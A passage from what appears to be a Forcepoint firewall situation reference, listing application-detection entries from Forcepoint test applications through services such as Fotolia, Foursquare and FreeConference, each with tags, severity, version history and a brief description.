Description: Forcepoint Test Application: Mail matches if1)A decrypted connection to https://applications.policytest.ngfw.forcepoint.com serves any URL ending in:/12d149971553a38f740c49bdcfba1eabd23ce711bce320e2d1be37202eed6b77.htmlor2)A connection is made to https://mail.applications.policytest.ngfw.forcepoint.com
Back to top

Forcepoint Test Application: Marketing

About this situation: Forcepoint Test Application: Marketing
Context: Application Context
Severity: 1
Tags: Web Applications, Marketing
First detected in: sgpkg-ips-1200-5242
Last changed: sgpkg-ips-1629-5242
Description: Forcepoint Test Application: Marketing matches if1)A decrypted connection to https://applications.policytest.ngfw.forcepoint.com serves any URL ending in:/12d149971553a38f740c49bdcfba1eabd23ce711bce320e2d1be37202eed6b78.htmlor2)A connection is made to https://marketing.applications.policytest.ngfw.forcepoint.com
Back to top

Forcepoint Test Application: Media

About this situation: Forcepoint Test Application: Media
Context: Application Context
Severity: 1
Tags: Web Applications, Media
First detected in: sgpkg-ips-1200-5242
Last changed: sgpkg-ips-1629-5242
Description: Forcepoint Test Application: Media matches if1)A decrypted connection to https://applications.policytest.ngfw.forcepoint.com serves any URL ending in:/12d149971553a38f740c49bdcfba1eabd23ce711bce320e2d1be37202eed6b79.htmlor2)A connection is made to https://media.applications.policytest.ngfw.forcepoint.com
Back to top

Forcepoint Test Application: Miscellaneous

About this situation: Forcepoint Test Application: Miscellaneous
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous
First detected in: sgpkg-ips-1200-5242
Last changed: sgpkg-ips-1629-5242
Description: Forcepoint Test Application: Miscellaneous matches if1)A decrypted connection to https://applications.policytest.ngfw.forcepoint.com serves any URL ending in:/12d149971553a38f740c49bdcfba1eabd23ce711bce320e2d1be37202eed6b7a.htmlor2)A connection is made to https://miscellaneous.applications.policytest.ngfw.forcepoint.com
Back to top

Forcepoint Test Application: Office

About this situation: Forcepoint Test Application: Office
Context: Application Context
Severity: 1
Tags: Web Applications, Office
First detected in: sgpkg-ips-1200-5242
Last changed: sgpkg-ips-1629-5242
Description: Forcepoint Test Application: Office matches if1)A decrypted connection to https://applications.policytest.ngfw.forcepoint.com serves any URL ending in:/12d149971553a38f740c49bdcfba1eabd23ce711bce320e2d1be37202eed6b7b.htmlor2)A connection is made to https://office.applications.policytest.ngfw.forcepoint.com
Back to top

Forcepoint Test Application: OPC Alarms and Events

About this situation: Forcepoint Test Application: OPC Alarms and Events
Context: Application Context
Severity: 1
Tags: Web Applications, OPC Alarms and Events
First detected in: sgpkg-ips-1200-5242
Last changed: sgpkg-ips-1629-5242
Description: Forcepoint Test Application: OPC Alarms and Events matches if1)A decrypted connection to https://applications.policytest.ngfw.forcepoint.com serves any URL ending in:/12d149971553a38f740c49bdcfba1eabd23ce711bce320e2d1be37202eed6b7c.htmlor2)A connection is made to https://opc-alarms-and-events.applications.policytest.ngfw.forcepoint.com
Back to top

Forcepoint Test Application: OPC Auxiliary

About this situation: Forcepoint Test Application: OPC Auxiliary
Context: Application Context
Severity: 1
Tags: Web Applications, OPC Auxiliary
First detected in: sgpkg-ips-1200-5242
Last changed: sgpkg-ips-1629-5242
Description: Forcepoint Test Application: OPC Auxiliary matches if1)A decrypted connection to https://applications.policytest.ngfw.forcepoint.com serves any URL ending in:/12d149971553a38f740c49bdcfba1eabd23ce711bce320e2d1be37202eed6b7d.htmlor2)A connection is made to https://opc-auxiliary.applications.policytest.ngfw.forcepoint.com
Back to top

Forcepoint Test Application: OPC Data Access

About this situation: Forcepoint Test Application: OPC Data Access
Context: Application Context
Severity: 1
Tags: Web Applications, OPC Data Access
First detected in: sgpkg-ips-1200-5242
Last changed: sgpkg-ips-1629-5242
Description: Forcepoint Test Application: OPC Data Access matches if1)A decrypted connection to https://applications.policytest.ngfw.forcepoint.com serves any URL ending in:/12d149971553a38f740c49bdcfba1eabd23ce711bce320e2d1be37202eed6b7e.htmlor2)A connection is made to https://opc-data-access.applications.policytest.ngfw.forcepoint.com
Back to top

Forcepoint Test Application: OPC Historical Data Access

About this situation: Forcepoint Test Application: OPC Historical Data Access
Context: Application Context
Severity: 1
Tags: Web Applications, OPC Historical Data Access
First detected in: sgpkg-ips-1200-5242
Last changed: sgpkg-ips-1629-5242
Description: Forcepoint Test Application: OPC Historical Data Access matches if1)A decrypted connection to https://applications.policytest.ngfw.forcepoint.com serves any URL ending in:/12d149971553a38f740c49bdcfba1eabd23ce711bce320e2d1be37202eed6b7f.htmlor2)A connection is made to https://opc-historical-data-access.applications.policytest.ngfw.forcepoint.com
Back to top

Forcepoint Test Application: Orienteering

About this situation: Forcepoint Test Application: Orienteering
Context: Application Context
Severity: 1
Tags: Web Applications, Orienteering
First detected in: sgpkg-ips-1200-5242
Last changed: sgpkg-ips-1629-5242
Description: Forcepoint Test Application: Orienteering matches if1)A decrypted connection to https://applications.policytest.ngfw.forcepoint.com serves any URL ending in:/12d149971553a38f740c49bdcfba1eabd23ce711bce320e2d1be37202eed6b80.htmlor2)A connection is made to https://orienteering.applications.policytest.ngfw.forcepoint.com
Back to top

Forcepoint Test Application: P2P

About this situation: Forcepoint Test Application: P2P
Context: Application Context
Severity: 1
Tags: Web Applications, P2P
First detected in: sgpkg-ips-1200-5242
Last changed: sgpkg-ips-1629-5242
Description: Forcepoint Test Application: P2P matches if1)A decrypted connection to https://applications.policytest.ngfw.forcepoint.com serves any URL ending in:/12d149971553a38f740c49bdcfba1eabd23ce711bce320e2d1be37202eed6b81.htmlor2)A connection is made to https://p2p.applications.policytest.ngfw.forcepoint.com
Back to top

Forcepoint Test Application: Photo/Video Sharing

About this situation: Forcepoint Test Application: Photo/Video Sharing
Context: Application Context
Severity: 1
Tags: Web Applications, Photo/Video Sharing
First detected in: sgpkg-ips-1200-5242
Last changed: sgpkg-ips-1629-5242
Description: Forcepoint Test Application: Photo/Video Sharing matches if1)A decrypted connection to https://applications.policytest.ngfw.forcepoint.com serves any URL ending in:/12d149971553a38f740c49bdcfba1eabd23ce711bce320e2d1be37202eed6b82.htmlor2)A connection is made to https://photo-video-sharing.applications.policytest.ngfw.forcepoint.com
Back to top

Forcepoint Test Application: Reference

About this situation: Forcepoint Test Application: Reference
Context: Application Context
Severity: 1
Tags: Web Applications, Reference
First detected in: sgpkg-ips-1200-5242
Last changed: sgpkg-ips-1629-5242
Description: Forcepoint Test Application: Reference matches if1)A decrypted connection to https://applications.policytest.ngfw.forcepoint.com serves any URL ending in:/12d149971553a38f740c49bdcfba1eabd23ce711bce320e2d1be37202eed6b84.htmlor2)A connection is made to https://reference.applications.policytest.ngfw.forcepoint.com
Back to top

Forcepoint Test Application: Remote control

About this situation: Forcepoint Test Application: Remote control
Context: Application Context
Severity: 1
Tags: Web Applications, Remote control
First detected in: sgpkg-ips-1200-5242
Last changed: sgpkg-ips-1629-5242
Description: Forcepoint Test Application: Remote control matches if1)A decrypted connection to https://applications.policytest.ngfw.forcepoint.com serves any URL ending in:/12d149971553a38f740c49bdcfba1eabd23ce711bce320e2d1be37202eed6b85.htmlor2)A connection is made to https://remote-control.applications.policytest.ngfw.forcepoint.com
Back to top

Forcepoint Test Application: Social Networking

About this situation: Forcepoint Test Application: Social Networking
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking
First detected in: sgpkg-ips-1200-5242
Last changed: sgpkg-ips-1629-5242
Description: Forcepoint Test Application: Social Networking matches if1)A decrypted connection to https://applications.policytest.ngfw.forcepoint.com serves any URL ending in:/12d149971553a38f740c49bdcfba1eabd23ce711bce320e2d1be37202eed6b86.htmlor2)A connection is made to https://social-networking.applications.policytest.ngfw.forcepoint.com
Back to top

Forcepoint Test Application: Statistics

About this situation: Forcepoint Test Application: Statistics
Context: Application Context
Severity: 1
Tags: Web Applications, Statistics
First detected in: sgpkg-ips-1200-5242
Last changed: sgpkg-ips-1629-5242
Description: Forcepoint Test Application: Statistics matches if1)A decrypted connection to https://applications.policytest.ngfw.forcepoint.com serves any URL ending in:/12d149971553a38f740c49bdcfba1eabd23ce711bce320e2d1be37202eed6b87.htmlor2)A connection is made to https://statistics.applications.policytest.ngfw.forcepoint.com
Back to top

Forcepoint Test Application: Storage

About this situation: Forcepoint Test Application: Storage
Context: Application Context
Severity: 1
Tags: Web Applications, Storage
First detected in: sgpkg-ips-1200-5242
Last changed: sgpkg-ips-1629-5242
Description: Forcepoint Test Application: Storage matches if1)A decrypted connection to https://applications.policytest.ngfw.forcepoint.com serves any URL ending in:/12d149971553a38f740c49bdcfba1eabd23ce711bce320e2d1be37202eed6b88.htmlor2)A connection is made to https://storage.applications.policytest.ngfw.forcepoint.com
Back to top

Forcepoint Test Application: Travel and Expense

About this situation: Forcepoint Test Application: Travel and Expense
Context: Application Context
Severity: 1
Tags: Web Applications, Travel and Expense
First detected in: sgpkg-ips-1200-5242
Last changed: sgpkg-ips-1629-5242
Description: Forcepoint Test Application: Travel and Expense matches if1)A decrypted connection to https://applications.policytest.ngfw.forcepoint.com serves any URL ending in:/12d149971553a38f740c49bdcfba1eabd23ce711bce320e2d1be37202eed6b89.htmlor2)A connection is made to https://travel-and-expense.applications.policytest.ngfw.forcepoint.com
Back to top

Forcepoint Test Application: Tunneling

About this situation: Forcepoint Test Application: Tunneling
Context: Application Context
Severity: 1
Tags: Web Applications, Tunneling
First detected in: sgpkg-ips-1200-5242
Last changed: sgpkg-ips-1629-5242
Description: Forcepoint Test Application: Tunneling matches if1)A decrypted connection to https://applications.policytest.ngfw.forcepoint.com serves any URL ending in:/12d149971553a38f740c49bdcfba1eabd23ce711bce320e2d1be37202eed6b8a.htmlor2)A connection is made to https://tunneling.applications.policytest.ngfw.forcepoint.com
Back to top

Forcepoint Test Application: Updates

About this situation: Forcepoint Test Application: Updates
Context: Application Context
Severity: 1
Tags: Web Applications, Updates
First detected in: sgpkg-ips-1200-5242
Last changed: sgpkg-ips-1629-5242
Description: Forcepoint Test Application: Updates matches if1)A decrypted connection to https://applications.policytest.ngfw.forcepoint.com serves any URL ending in:/12d149971553a38f740c49bdcfba1eabd23ce711bce320e2d1be37202eed6b8b.htmlor2)A connection is made to https://updates.applications.policytest.ngfw.forcepoint.com
Back to top

Forcepoint Test Application: Web Mail

About this situation: Forcepoint Test Application: Web Mail
Context: Application Context
Severity: 1
Tags: Web Applications, Web Mail
First detected in: sgpkg-ips-1200-5242
Last changed: sgpkg-ips-1629-5242
Description: Forcepoint Test Application: Web Mail matches if1)A decrypted connection to https://applications.policytest.ngfw.forcepoint.com serves any URL ending in:/12d149971553a38f740c49bdcfba1eabd23ce711bce320e2d1be37202eed6b8c.htmlor2)A connection is made to https://web-mail.applications.policytest.ngfw.forcepoint.com
Back to top

Forcepoint VPN Client

About this situation: Endpoint Context Agent based Forcepoint VPN Client detection
Context: EI Correlation
Severity: 1
Tags: System Services, Endpoint
First detected in: sgpkg-ips-1570-5242
Last changed: sgpkg-ips-1570-5242
Description: Forcepoint VPN Client application detected.
Back to top

Forcepoint-CASB

About this situation: Forcepoint CASB (cloud access security broker) usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-941-5242
Last changed: sgpkg-ips-941-5242
Description: Forcepoint CASB (cloud access security broker) provides visibility and control over sanctioned and unsanctioned cloud apps to enable their safe and productive use.
Back to top

Forcepoint-SMC-Update

About this situation: Forcepoint SMC Update usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Updates, Application Routing
First detected in: sgpkg-ips-570-5211
Last changed: sgpkg-ips-1144-5242
Description: Forcepoint SMC Update service usage has been detected.
Back to top

Forcepoint_Drop

About this situation: Forcepoint Drop IP matched
Context: IP list ID for source or destination address
Severity: 1
Tags: Potential Compromise
First detected in: sgpkg-ips-1663-5242
Last changed: sgpkg-ips-1663-5242
Description: A situation to match known Forcepoint Drop IP Addresses. The IP list is not a proper replacement for a URL reputation service.
Back to top

Forcify.Me

About this situation: Application Forcify.Me detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Forcify.me provides Salesforce.com training videos for nonprofits that can supplement, and in some cases replace, instructor-led training which can be cost prohibitive.
Back to top

Foreca

About this situation: Foreca weather service usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-602-5211
Last changed: sgpkg-ips-630-5211
Description: Foreca weather service usage has been detected.
Back to top

Foreign-Policy

About this situation: Foreign Policy usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-602-5211
Last changed: sgpkg-ips-602-5211
Description: Foreign Policy usage detected. Foreign Policy is a magazine about international political relations.
Back to top

ForeScout SecureConnector

About this situation: Endpoint Context Agent based ForeScout SecureConnector detection
Context: EI Correlation
Severity: 1
Tags: Remote Administration, Endpoint
First detected in: sgpkg-ips-982-5242
Last changed: sgpkg-ips-1531-5242
Description: ForeScout SecureConnector endpoint application has been detected. ForeScout SecureConnector is part of ForeScout CounterACT solution, which provides visibility and policy-based control over the devices that connect to the network.
Back to top

Foresee

About this situation: Application Foresee detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ForeSee delivers superior technology and proven methodology to connect the customer experience to the bottom line. This enables executives and managers to drive future success by confidently optimizing the efforts that will achieve business and brand objectives.
Back to top

FormAssembly

About this situation: Application FormAssembly detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: FormAssembly is a web-based service that helps businesses and professionals create state-of-the-art web forms and surveys, and collect data without the need for technical skills or desktop software.
Back to top

FormCrafts

About this situation: Application FormCrafts detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: FormCrafts is an online drag-and-drop form builder for making awesome forms, lightning fast.
Back to top

FormExperts

About this situation: Application FormExperts detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: FormExperts - The Ultimate Online Form Resource. Affordable and Instant Web Forms For Your Website. Professional-quality, fully-customizable forms
Back to top

Forms-on-the-Fly

About this situation: Application Forms-on-the-Fly detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Forms on the Fly allow create and publish online forms delivering personalised reports in minutes to use for quizzes, questionnaires and diagnostics for lead generation, support, training,
Back to top

FormSite

About this situation: Application FormSite detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: FormSite.com is a service that enables non-technical users to build professional quality web forms and surveys with no HTML or coding experience.
Back to top

Formstack

About this situation: Formstack usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-631-5211
Description: This site allows users to create any type of online form, including surveys, contact forms, event registrations, and order forms. Users can then integrate the forms into their sites and begin collecting data. Source: Wikipedia
Back to top

Forrester

About this situation: Application Forrester detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Forrester Research, Inc. is an independent research company that provides pragmatic and forward-thinking advice to global leaders in business and technology.
Back to top

Forsythe

About this situation: Application Forsythe detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Forsythe is an IT infrastructure integrator that provides technology consulting, IT infrastructure technology and integration, and leasing solutions for business. It helps organizations to optimize cost and manage risk.
Back to top

Fortiguard-Web-Filtering

About this situation: FortiGuard Web Filtering usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Infrastructure Services, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-943-5242
Description: Fortiguard is a web filtering service by Fortinet.
Back to top

Fortinet

About this situation: Application Fortinet detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Fortinet is a provider of cyber security solutions, offers enterprise-level generation firewalls and network security products.
Back to top

Fortnite

About this situation: Fornite game usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-1120-5242
Last changed: sgpkg-ips-1764-5242
Description: Fortnite is an online video game released in 2017.
Back to top

Fortnox

About this situation: Application Fortnox detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Fortnox is provider of online business management software, and serves more than 45,000 customers with approximately 100,000 registered users across Europe.
Back to top

Forward

About this situation: Application Forward detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Forward is the easiest way to share a web project on your localhost over the internet
Back to top

Fotki

About this situation: Fotki usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Photo/Video Sharing, Application Routing
First detected in: sgpkg-ips-437-4219
Last changed: sgpkg-ips-636-5211
Description: Fotki is a digital photo sharing, video sharing and media social network website and web service suite. Theapplication is available at the site https://www.fotki.com.
Back to top

Fotobabble

About this situation: Application Fotobabble detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Fotobabble provides photo- and audio-powered social marketing solutions for businesses, brands and nonprofits.
Back to top

Fotoflexer

About this situation: Application Fotoflexer detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: FotoFlexer - is online photo editor in existence. It can remove blemishes, change skin
Back to top

Fotolia

About this situation: Application Fotolia detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Fotolia is a marketplace of stock photography, providing instant access to over 35 million royalty-free images, vectors, illustrations and video clips.
Back to top

Fotolog

About this situation: Fotolog usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A web-based social networking service which allows users to connect and share information with each other online.
Back to top

Fotor

About this situation: Application Fotor detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Fotor is an online photo editing tool.
Back to top

Foundation-3000

About this situation: Application Foundation-3000 detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Foundation 3000 is an all-in-one software that centralizes your business operational processes in one place. This MS Windows based system helps growing enterprises that want to move up to the next level and includes ERP, RCRM, REDI and ROnline and Mobile Solutions.
Back to top

Four-Winds-Interactive

About this situation: Application Four-Winds-Interactive detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: FWI is a digital signage software, serving multiple markers with a wide array of digital signage applications.
Back to top

Four51

About this situation: Application Four51 detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Four51 is a cloud eCommerce API that enables rapid deployment of custom, comprehensive, secure, and scalable eCommerce applications.
Back to top

Foursquare

About this situation: Foursquare usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-431-4219
Last changed: sgpkg-ips-628-5211
Description: Foursquare is a free application that allows users to "check in" to places they are currently visiting and share the information with other users.
Back to top

Fox-Learning

About this situation: Application Fox-Learning detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Fox Learning offers computer training, social media training and digital skills workshops to businesses and individuals.
Back to top

Fox-News

About this situation: Fox News usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-567-5211
Last changed: sgpkg-ips-595-5211
Description: Fox News website features the latest coverage (including columns by FNC television, radio and online personalities). Video clips are also available on Foxnews.com and Foxbusiness.com. Source: Wikipedia
Back to top

Fox.com

About this situation: Fox.com usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-623-5211
Last changed: sgpkg-ips-623-5211
Description: Fox Broadcasting Company is an American commercial broadcast television network that is owned by the Fox Entertainment Group division of 21st Century Fox. Source: Wikipedia
Back to top

Foxit-Software-Update

About this situation: Foxit Software update service usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Updates, Application Routing
First detected in: sgpkg-ips-601-5211
Last changed: sgpkg-ips-625-5211
Description: Foxit Software update service usage. Foxit Software is producer of various software, including Foxit Reader.
Back to top

Foxy.IO

About this situation: Application Foxy.IO detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: FoxyCart is a hosted PCI compliant e-commerce platform built to empower web developers and designers with a flexible platform with which to add e-commerce functionality to existing systems. It's not an all-in-one system with an integrated CMS, CRM, email marketing system, or anything else.
Back to top

FoxyUtils

About this situation: Application FoxyUtils detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: FoxyUtils provides online web apps for PDF document manipulation, to merge, split, unlock or protect PDF files.
Back to top

Fpt-software

About this situation: Application Fpt-software detected
Context: Application Context
Severity: 1
Tags: Web Applications, ERP/CRM
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: FPT Software is provider of software outsourcing services headquartered in Vietnam.
Back to top

FrameFish-Virtual-Mirror

About this situation: Application FrameFish-Virtual-Mirror detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: FrameFish installs on your website, allowing shoppers to virtually try-on your glasses or sunglasses using their laptop, tablet or smartphone.
Back to top

Frankfurter-Allgemeine

About this situation: FAZ.net usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-707-5211
Last changed: sgpkg-ips-707-5211
Description: Frankfurter Allgemeine Zeitung is a German daily newspaper.
Back to top

FRBO

About this situation: Application FRBO detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: FRBO
Back to top

Free

About this situation: Free usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Storage, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: ifile.itt: This site is a global data storage service that allows users to upload and share multimedia files.
Back to top

Free disk space on server reached alert threshold

About this situation: Free disk space on server reached alert threshold
Context: Log Server situations
Severity: 8
Tags: SMC
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1296-5242
Description: The free disk space on the server has dropped below the threshold percentage set in the server configuration file.
Back to top

Free-Online-Games

About this situation: Free Online Games usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A Web-based Gaming service where users can play games or get gaming information online using a web browser.
Back to top

Free-PDF-Convert

About this situation: Application Free-PDF-Convert detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: PDF Converter is a online web-based document to PDF converter software.
Back to top

Free-World-Group

About this situation: Free World Group usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A Web-based Gaming service where users can play games or get gaming information online using a web browser.
Back to top

Freeagent

About this situation: FreeAgent usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-626-5211
Last changed: sgpkg-ips-1764-5242
Description: This software allows users to manage expenses, estimates, time tracking, invoices, and prepare for taxes. Source: Wikipedia
Back to top

Freecast

About this situation: FreeCast usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: is a leader in digital television distribution and innovation, with a focus on building a comprehensive digital media network and developing products.
Back to top

FreeConference

About this situation: Application FreeConference detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: FreeConference.com offers conference call services for you to meet by telephone or by web with your customers, relatives or colleagues.
Back to top

FreeConferenceCall.com

About this situation: Application FreeConferenceCall.com detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Free Conferencing Corporation is an independent provider of collaborative communications solutions serving a range of businesses, individuals, communities and organizations around the world.
Back to top

FreeConferenceCalling.com

About this situation: Application FreeConferenceCalling.com detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: FreeConferenceCalling - is a conference call service. Free Conference Calling provides a vital service for individuals, non-profits and businesses alike. Use our free conference call services for best call quality and conference capacity.
Back to top

FreeCRM

About this situation: Application FreeCRM detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Free CRM Software for customer relationship management, sales and support.
Back to top

Freedom-Services

About this situation: Application Freedom-Services detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Freedom Services, Inc. is a full service employee benefit administration company, provide comprehensive administration services, such as
Back to top

FreeDrive

About this situation: Application FreeDrive detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Social Networking, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: FreeDrive, online storage and social utility, for store, access, and share photos and files online.
Back to top

Freeetv

About this situation: FREEETV usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: Online Internet television
Back to top

FreeHostia

About this situation: Application FreeHostia detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: FreeHostia offers hosting services including Control Panel and a 1-click installation of apps.
Back to top

Freelotto

About this situation: FreeLotto usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A Web-based Gaming service where users can play games or get gaming information online using a web browser.
Back to top

Freeonlinesurveys

About this situation: FreeOnlineSurveys usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-713-5211
Last changed: sgpkg-ips-1764-5242
Description: FreeOnlineSurveys.com quickly creates an online survey, generate online polls, and generate forms using the free form generator.
Back to top

FreePP

About this situation: FreePP usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Chat, Application Routing
First detected in: sgpkg-ips-664-5211
Last changed: sgpkg-ips-664-5211
Description: FreePP is a smart phone application for internet voice calls and multimedia messaging. The application is available on Android, iOS and Windows Phone platforms.
Back to top

Freescale

About this situation: Application Freescale detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Freescale Semiconductor produces and designs embedded hardware, focuses on the automotive, consumer, industrial and networking markets with its product portfolio including microprocessors, microcontrollers, digital signal processors, digital signal controllers, sensors, RF power ICs and power management ICs.
Back to top

FreeWebsite.com

About this situation: Application FreeWebsite.com detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: FreeWebsite.com allow create personal or business website. Customize with point and click website builder. Free web hosting, professional web design.
Back to top

FreeWheel

About this situation: Application FreeWheel detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Freewheel is WiFi phone with unlimited data, calling, and texting. Save wireless phone calls and data charges by using any wifi hotspot instead of a cellular network.
Back to top

Freightquote

About this situation: Application Freightquote detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
